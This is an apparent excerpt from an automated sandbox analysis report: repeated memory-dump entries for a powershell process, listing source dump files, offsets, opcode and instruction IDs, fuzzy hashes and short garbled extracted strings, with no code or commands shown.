                                                                                                                                                                • Source File: 00000002.00000002.2419359097.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_72b0000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: (f=l
                                                                                                                                                                • API String ID: 0-645171858
                                                                                                                                                                • Opcode ID: 1984de87763cfc18171f5f2c784d817796bd4c4e1fd8ffee19cf9536e17bacea
                                                                                                                                                                • Instruction ID: 5b6cd42d9b7348c4a736306641175cf9da1d435976f5dc6f91423f4b2e7f58a7
                                                                                                                                                                • Opcode Fuzzy Hash: 1984de87763cfc18171f5f2c784d817796bd4c4e1fd8ffee19cf9536e17bacea
                                                                                                                                                                • Instruction Fuzzy Hash: 9551D574721202EFDB24CF64C541FAABBB2EF85345F14806AE9016B392C776DD45CB61
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2419359097.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_72b0000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: x..k
                                                                                                                                                                • API String ID: 0-1820036473
                                                                                                                                                                • Opcode ID: 0a1c18296a34a8134f32181a81e8e4b7611eb31bcf181dc2a1a8228e722217ca
                                                                                                                                                                • Instruction ID: ef76f984e1145060271f82c36a709656519e535ba42057fddd3ab104ee1ce7b6
                                                                                                                                                                • Opcode Fuzzy Hash: 0a1c18296a34a8134f32181a81e8e4b7611eb31bcf181dc2a1a8228e722217ca
                                                                                                                                                                • Instruction Fuzzy Hash: 1C31D874B502049BD7149B68C992BAFBBA3DF84344F10C414E9016F396CF7AAC46CBE1
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2422828811.0000000009020000.00000040.00000800.00020000.00000000.sdmp, Offset: 09020000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_9020000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: 4'jq
                                                                                                                                                                • API String ID: 0-3676250632
                                                                                                                                                                • Opcode ID: 78b9feaa677a7d9caeb332edf0c2f3bf2a4307443a9cc8e296e1ac2ba6fe7af4
                                                                                                                                                                • Instruction ID: 159e123cfc35d8c1a2349df35a3aa582f056c038ebf1f51406df13660b00d126
                                                                                                                                                                • Opcode Fuzzy Hash: 78b9feaa677a7d9caeb332edf0c2f3bf2a4307443a9cc8e296e1ac2ba6fe7af4
                                                                                                                                                                • Instruction Fuzzy Hash: 32213831B08324DBDBE04E25844277EB7D39F84740F654965F911EB284DB3AE942C7E1
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2419359097.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_72b0000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: j
                                                                                                                                                                • API String ID: 0-2137352139
                                                                                                                                                                • Opcode ID: 05dbc4d3f273c2aa10313fa6b53f7b033495d9b000bdea223b5aaa118e492491
                                                                                                                                                                • Instruction ID: 01fc124ab7c9e94b74e53054058fde6079cd1182e2a7f21585650c337477144e
                                                                                                                                                                • Opcode Fuzzy Hash: 05dbc4d3f273c2aa10313fa6b53f7b033495d9b000bdea223b5aaa118e492491
                                                                                                                                                                • Instruction Fuzzy Hash: EAF04CF5668286D7E730BEA8CCC0ED5B711EF91364F0482AEE6154A197C772C012C753
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2422800560.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_9010000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 06f3bc38a8fea96085fc6c1b3704ccf8bd1ba020780842c36e326ac2946d7816
                                                                                                                                                                • Instruction ID: 40fefc32005ea01975af79caa804713a9a3e6de07a3cc9a4c4052a77f74d9234
                                                                                                                                                                • Opcode Fuzzy Hash: 06f3bc38a8fea96085fc6c1b3704ccf8bd1ba020780842c36e326ac2946d7816
                                                                                                                                                                • Instruction Fuzzy Hash: F6021B74A002099FCB55CF9CD984AAEBBF2FF88310F258559E915AB365C731ED81CB90
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2422800560.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_9010000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: b7314e38de0b4077e8a36e44fac9f4102628bc3c0fb615678370666c9cffb053
                                                                                                                                                                • Instruction ID: 58b524723497bc7730010c6fb89e3c969e8b79723ccd8c00b410bbd2817e415a
                                                                                                                                                                • Opcode Fuzzy Hash: b7314e38de0b4077e8a36e44fac9f4102628bc3c0fb615678370666c9cffb053
                                                                                                                                                                • Instruction Fuzzy Hash: 56020975A012099FCB05CF9CD994AAEBBF2FF88310F248559E815AB365C735ED81CB90
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2422800560.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_9010000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: df5a2d65171ddbc38bb023a4a214019a0e4e3ad95824f9537700ef6b59cb9da8
                                                                                                                                                                • Instruction ID: 3de7eb16e8224d1eaf23d0f997951784db104cd9e9c526056873ebd6d5d91321
                                                                                                                                                                • Opcode Fuzzy Hash: df5a2d65171ddbc38bb023a4a214019a0e4e3ad95824f9537700ef6b59cb9da8
                                                                                                                                                                • Instruction Fuzzy Hash: 66F14874A01249DFCB05CFA8D584A9EBBF2FF89310F248559E845AB361C735ED82CB90
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2422800560.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_9010000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 1682b41299760ca305e1c014d04bcac8b25ae17cda2520ca5d6bf7b8832b9c42
                                                                                                                                                                • Instruction ID: 2b66264f390a45f1c7f47003652784bdc36b00aebac631a433c2c2a3b92c7a69
                                                                                                                                                                • Opcode Fuzzy Hash: 1682b41299760ca305e1c014d04bcac8b25ae17cda2520ca5d6bf7b8832b9c42
                                                                                                                                                                • Instruction Fuzzy Hash: 0081AE31B002098FCB05DFA9D950AAEBBFAFF88300F148569D4459B365DB35ED46CBA1
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2422800560.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_9010000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 6d0fb175d4f41b5cdb1f0d26175c72c36bf10bd7836275205607253a74087434
                                                                                                                                                                • Instruction ID: e14f79f0cc53e552527b70761892dcbd54a040c79bf9f6ee548c4332146ed259
                                                                                                                                                                • Opcode Fuzzy Hash: 6d0fb175d4f41b5cdb1f0d26175c72c36bf10bd7836275205607253a74087434
                                                                                                                                                                • Instruction Fuzzy Hash: 5D513F70A006098FCB15CF9CC9959AEFBB2FF88314B648658E925A73A4D331EC91CB50
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2422800560.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_9010000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 1fbb7bdc8f63246c4aa0ce116dfc286ff991b080e005affb68c6b157338e17c3
                                                                                                                                                                • Instruction ID: f446fcebbc4f1fb8f5cf2a0624f5f27ca9d42095736c2e9b2246d4e2da1d0abf
                                                                                                                                                                • Opcode Fuzzy Hash: 1fbb7bdc8f63246c4aa0ce116dfc286ff991b080e005affb68c6b157338e17c3
                                                                                                                                                                • Instruction Fuzzy Hash: 1D514170A006099FCB15CF9CC9949AEFBB2FF48310B648559E925E73A4C735EC91CB90
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2422800560.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_9010000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: c26b88d3c6c0fc72ddad735c7470b413e38cd6f866767900b82653936ee837ee
                                                                                                                                                                • Instruction ID: 2585d50d7884db7e640df7dbcf079bd62f1fa5e605b1918fb98fd2ed1b417827
                                                                                                                                                                • Opcode Fuzzy Hash: c26b88d3c6c0fc72ddad735c7470b413e38cd6f866767900b82653936ee837ee
                                                                                                                                                                • Instruction Fuzzy Hash: 7F51E634A00209EFDB05CF98D584A9DBBF6FF88314F248559E805AB365CB35ED82CB90
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2422800560.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_9010000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: ac56a4dbcea03c5880d057e8398ace3a2dc2255e93f256d6c3e706dba537309a
                                                                                                                                                                • Instruction ID: e8f01a094d076171401984d7a967027c5caca1bdf6a9a0f11de08594f80cfd0d
                                                                                                                                                                • Opcode Fuzzy Hash: ac56a4dbcea03c5880d057e8398ace3a2dc2255e93f256d6c3e706dba537309a
                                                                                                                                                                • Instruction Fuzzy Hash: 5C411A74A011059FCB15CF9CC994AAEBBF1FF49314B648658E925EB3A5C335EC81CB90
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2422800560.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_9010000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: fe6ad891334f94f8cdfb3ca540a11091ac2fcbb6b04cc482d3876eb0a60a2719
                                                                                                                                                                • Instruction ID: 48dfba564ef92632b99287b7cd322c9b5037c197cfbdb94c04779c75b3808239
                                                                                                                                                                • Opcode Fuzzy Hash: fe6ad891334f94f8cdfb3ca540a11091ac2fcbb6b04cc482d3876eb0a60a2719
                                                                                                                                                                • Instruction Fuzzy Hash: EF410974A05115DFCB58CF9CC9849AEBBB2FF48310B248659E915E7364D331EC41CBA0
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2422800560.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_9010000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 2d76e31d288367a9e613a349d67b7cbd65d38b8bb476d30404bac63c4f4fbde3
                                                                                                                                                                • Instruction ID: c1b631ff120f5da622fcad6b3530cd285eae191c3971edafb92e7813ac5a5e3a
                                                                                                                                                                • Opcode Fuzzy Hash: 2d76e31d288367a9e613a349d67b7cbd65d38b8bb476d30404bac63c4f4fbde3
                                                                                                                                                                • Instruction Fuzzy Hash: 09413970A041099FCB49CF9CC9809AEBBF2FF48324B248659E915EB3A4C735EC41CB94
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2422800560.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_9010000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: efe955ce69ab7495e179f9d0dd73aa47635bc10d4386348ed904fe22082f9c1b
                                                                                                                                                                • Instruction ID: 19e2fb251f5cc9c3489b08d442848daf748902f929ccff0d8635d3ffe2a7d418
                                                                                                                                                                • Opcode Fuzzy Hash: efe955ce69ab7495e179f9d0dd73aa47635bc10d4386348ed904fe22082f9c1b
                                                                                                                                                                • Instruction Fuzzy Hash: 72416330A016459FCB15CF5CC894ABEFBB2FF84314F648A58D525AB2A5D735EC92CB80
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2419359097.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_72b0000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: dd0b75527b0fff590d91b04c2ce749c0c2db6591519097587799714b5a43bfa4
                                                                                                                                                                • Instruction ID: 5f078750c9b4bb011b3f2563092af16ea263e834b6fdd0743bf058e820b989e5
                                                                                                                                                                • Opcode Fuzzy Hash: dd0b75527b0fff590d91b04c2ce749c0c2db6591519097587799714b5a43bfa4
                                                                                                                                                                • Instruction Fuzzy Hash: B03199B67203438FCB305A7484122FAB79ADBD1381F448466E90ACB291DB39E802C7E1
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2422800560.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_9010000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 57e43676890ec97ac7ae4c83c4fb3ff74e1ec00de7b8dfc85c0f1f0dafb46a4d
                                                                                                                                                                • Instruction ID: 61273b4b1846348053c5aa16af94e379c78a93880a4b201e1c7d3fbee188a14b
                                                                                                                                                                • Opcode Fuzzy Hash: 57e43676890ec97ac7ae4c83c4fb3ff74e1ec00de7b8dfc85c0f1f0dafb46a4d
                                                                                                                                                                • Instruction Fuzzy Hash: 5F313A74A006099FCB15CF98C9909AAFBF2FF49310B258699D459EB3A1C331EC91CB90
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2422800560.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_9010000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 11242c472d6e4259f9ea039b9daa4e3ab771a3715b6cdffacbd29f2033e21bd8
                                                                                                                                                                • Instruction ID: 8689bfe1d12f7bca17ba71f456b85fdf5bd462810e962d31ddc682e0b2331cb0
                                                                                                                                                                • Opcode Fuzzy Hash: 11242c472d6e4259f9ea039b9daa4e3ab771a3715b6cdffacbd29f2033e21bd8
                                                                                                                                                                • Instruction Fuzzy Hash: D9119A2191E3C45FD7035768A8606DA3FB8AF83260F0A40EBC4C0CB1A3D628884DC7A6
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2422800560.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_9010000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: a40bad317a6b0d24a812fb75a1ece32fc4b0c00e40ac0d32de6ac4a52587106a
                                                                                                                                                                • Instruction ID: 30bf12cb2e9edc76f44de160dfca9bf4a6fdfa478e347cd5c6d2a1424f00d9e3
                                                                                                                                                                • Opcode Fuzzy Hash: a40bad317a6b0d24a812fb75a1ece32fc4b0c00e40ac0d32de6ac4a52587106a
                                                                                                                                                                • Instruction Fuzzy Hash: BF11E934A04209EFDB45CF98D484E9DBBB2FF88314F288559E445AB365C775E982CB40
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2419359097.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_72b0000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 0bdbf69640976f52aadb66b7970ac790b63ecb5575ef46c2d36dcc487b69e3ac
                                                                                                                                                                • Instruction ID: 4aadc28378b4b917991ecd5c277b7ab4df9f9b7cf6b4581987a07f6b36603700
                                                                                                                                                                • Opcode Fuzzy Hash: 0bdbf69640976f52aadb66b7970ac790b63ecb5575ef46c2d36dcc487b69e3ac
                                                                                                                                                                • Instruction Fuzzy Hash: E0014E72F7426187C33222780C135AE6793DBD1795B0108B6DE015F287DA695E1287E3
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2419359097.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_72b0000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: 4'jq$4'jq$84;l$84;l$84;l$84;l$tPjq$tPjq$tPjq$tPjq$$jq$(pq$(pq$(pq$(pq
                                                                                                                                                                • API String ID: 0-2263002695
                                                                                                                                                                • Opcode ID: 52bcd824ca126f1027fc165fc2d4539415d8a7fb231c1f9242d344aa113c5c5e
                                                                                                                                                                • Instruction ID: 725f49ff2524590adba2c52a03b94d326028269bafdb61cc0605cb08bc11ec33
                                                                                                                                                                • Opcode Fuzzy Hash: 52bcd824ca126f1027fc165fc2d4539415d8a7fb231c1f9242d344aa113c5c5e
                                                                                                                                                                • Instruction Fuzzy Hash: 09B128B17202179FCB34CF69CE506AABBE6EF89350F248459D801AB391CB75DD41CBA1
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2419359097.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_72b0000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: (f=l$(f=l$(f=l$(f=l$(f=l$4'jq$4'jq$4'jq$4'jq$tL/k$tL/k$x..k$-.k
                                                                                                                                                                • API String ID: 0-1360042268
                                                                                                                                                                • Opcode ID: 6d6cb9fb6f9d1d1cc407303e65f5ca67c6b6b48ddddbd9bde5c2a3183cd52dad
                                                                                                                                                                • Instruction ID: 1d6da7c7461dfae47ecae7993c76fb4fbcfcbf3a5fa74026d00a7cf67f71661c
                                                                                                                                                                • Opcode Fuzzy Hash: 6d6cb9fb6f9d1d1cc407303e65f5ca67c6b6b48ddddbd9bde5c2a3183cd52dad
                                                                                                                                                                • Instruction Fuzzy Hash: C42263B4A102198FDB24DB24C991BDEBBB2EF85304F118499D9096B391CB35EE81CF91
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2419359097.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_72b0000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: 4'jq$4'jq$84;l$84;l$d%pq$d%pq$d%pq$d%pq$tPjq$tPjq$$jq
                                                                                                                                                                • API String ID: 0-4177059406
                                                                                                                                                                • Opcode ID: 4397cc4915894ea4f08755564d69070880862bd84255ada8ba11aff91bd724b0
                                                                                                                                                                • Instruction ID: 416eaa9bd3551adc5f76ac23bcb767c2d5b85013901792c6e647f53bf0179317
                                                                                                                                                                • Opcode Fuzzy Hash: 4397cc4915894ea4f08755564d69070880862bd84255ada8ba11aff91bd724b0
                                                                                                                                                                • Instruction Fuzzy Hash: 917117B5B34217DFCB348F64CE506AABBE2EF85780F148869D8019B294DB35DC41C7A1
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2419359097.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_72b0000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: 4'jq$4'jq$tPjq$tPjq$#-k$$jq$$jq$$jq$3l$3l
                                                                                                                                                                • API String ID: 0-3469096826
                                                                                                                                                                • Opcode ID: 09257aab06ad269d68d4beec0c8e242eb9c2a24693e0a4c9408ec8384dab0e7d
                                                                                                                                                                • Instruction ID: cf525e9c8a0ee86b4de302b17f1fc5136d7389855231d06d75580baa0ca2b4e7
                                                                                                                                                                • Opcode Fuzzy Hash: 09257aab06ad269d68d4beec0c8e242eb9c2a24693e0a4c9408ec8384dab0e7d
                                                                                                                                                                • Instruction Fuzzy Hash: 40A16BB27243168FC7324B7984106FBBBA6EFC2790B14846BD645CB291DB35DD41C7A1
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2422828811.0000000009020000.00000040.00000800.00020000.00000000.sdmp, Offset: 09020000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_9020000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: 84;l$84;l$84;l$84;l$tPjq$tPjq$$jq$$jq$$jq
                                                                                                                                                                • API String ID: 0-2610624558
                                                                                                                                                                • Opcode ID: b08d28032a5d3a4b6b95fecf3b24ba0912c563f78c793423433670b0ac0674e6
                                                                                                                                                                • Instruction ID: ab8fde4a35a3769f882b70842800b11b5e8b8898c64babf7eafe7c9117be5b66
                                                                                                                                                                • Opcode Fuzzy Hash: b08d28032a5d3a4b6b95fecf3b24ba0912c563f78c793423433670b0ac0674e6
                                                                                                                                                                • Instruction Fuzzy Hash: D8D1C6317002149FCB58DFA8C85166EBBE6FF88710F14886AE9159B390DF36DD45CBA1
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2422828811.0000000009020000.00000040.00000800.00020000.00000000.sdmp, Offset: 09020000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_9020000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: 84;l$84;l$84;l$84;l$tPjq$tPjq$tPjq$tPjq
                                                                                                                                                                • API String ID: 0-3387844957
                                                                                                                                                                • Opcode ID: a9a3b3daf0f46ca675cdefe4aba76b84cf64a73941892d41093842a2b359f1cd
                                                                                                                                                                • Instruction ID: b16eb75f507942748c247aa0e823274928cafc0217ae469dbac247f0f64b03ce
                                                                                                                                                                • Opcode Fuzzy Hash: a9a3b3daf0f46ca675cdefe4aba76b84cf64a73941892d41093842a2b359f1cd
                                                                                                                                                                • Instruction Fuzzy Hash: E5C19131B00229DFCB55DF58D55166ABBE2FF88710B258869F9059B390CB3ADC41CBA1
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2422828811.0000000009020000.00000040.00000800.00020000.00000000.sdmp, Offset: 09020000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_9020000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: 84;l$84;l$XRoq$XRoq$XRoq$tPjq$tPjq$$jq
                                                                                                                                                                • API String ID: 0-3576435138
                                                                                                                                                                • Opcode ID: 0156812d313e3d0d59e2d995362bda6d4f2912ff8f61387fcfa050d85d06d2d6
                                                                                                                                                                • Instruction ID: 9d195032d5ec6ff5377da9a76a1f2e8696af2f88c12b1fe9b74bbb3c9be98b1a
                                                                                                                                                                • Opcode Fuzzy Hash: 0156812d313e3d0d59e2d995362bda6d4f2912ff8f61387fcfa050d85d06d2d6
                                                                                                                                                                • Instruction Fuzzy Hash: 4D612531B003249FCB159F288854A7BFBF6AF88710F24C86AE9059F295CB35DD45CBA1
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2419359097.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_72b0000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: tPjq$tPjq$$jq$$jq$$jq$$jq$3l$3l
                                                                                                                                                                • API String ID: 0-3626510696
                                                                                                                                                                • Opcode ID: 1fcfdc8578e77a0c366564ff1a027f0ddd208ab57b4ab772c545eaa6a93983bc
                                                                                                                                                                • Instruction ID: 1956df02461ca2d547a34f663ab9bbd0352049267518bc69e9e67cc006a76a34
                                                                                                                                                                • Opcode Fuzzy Hash: 1fcfdc8578e77a0c366564ff1a027f0ddd208ab57b4ab772c545eaa6a93983bc
                                                                                                                                                                • Instruction Fuzzy Hash: 435171B1B2434A9FD7344A6D88607A7BBB6EFC2351F18806BD546CB291DA71C850C791
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2419359097.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_72b0000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: $jq$$jq$$jq$$jq$$jq$$jq
                                                                                                                                                                • API String ID: 0-3356825164
                                                                                                                                                                • Opcode ID: 3029a1047b207139eae854d038b493e1a18f2071e40511bf49a0c314ef11f5ec
                                                                                                                                                                • Instruction ID: bb1e35a65c07e628777f9558fff2760f32b566f0e3b854da039c771226b4f5e4
                                                                                                                                                                • Opcode Fuzzy Hash: 3029a1047b207139eae854d038b493e1a18f2071e40511bf49a0c314ef11f5ec
                                                                                                                                                                • Instruction Fuzzy Hash: 963145F67743838FCB354AA998201FAB7A2EFD2391B14847FC8428B242DE35C845C751
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2419359097.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
